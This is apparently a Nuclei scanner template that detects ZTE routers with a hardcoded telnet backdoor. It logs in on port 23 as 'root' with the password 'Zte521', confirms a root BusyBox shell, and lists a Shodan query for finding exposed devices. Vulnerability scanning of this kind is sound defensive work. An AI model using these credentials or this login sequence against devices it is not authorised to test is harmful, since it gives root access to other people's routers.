id: backdoored-zte

info:
  name: Backdoored ZTE Routers
  author: its0x08
  severity: high
  description: |
    Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
  reference:
    - https://www.exploit-db.com/ghdb/7179
  metadata:
    verified: true
    shodan-query: http.html:"ZTE Corporation"
  tags: edb,network,zte,telnet,backdoor,router

network:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:23"

    inputs:
      - data: "root\r\n"
      - data: "Zte521\r\n\r\n"
        read: 1024

    matchers:
      - type: word
        words:
          - "BusyBox"

    extractors:
      - type: regex
        regex:
          - '[A-Z]{1,}[0-9]{3,4}'
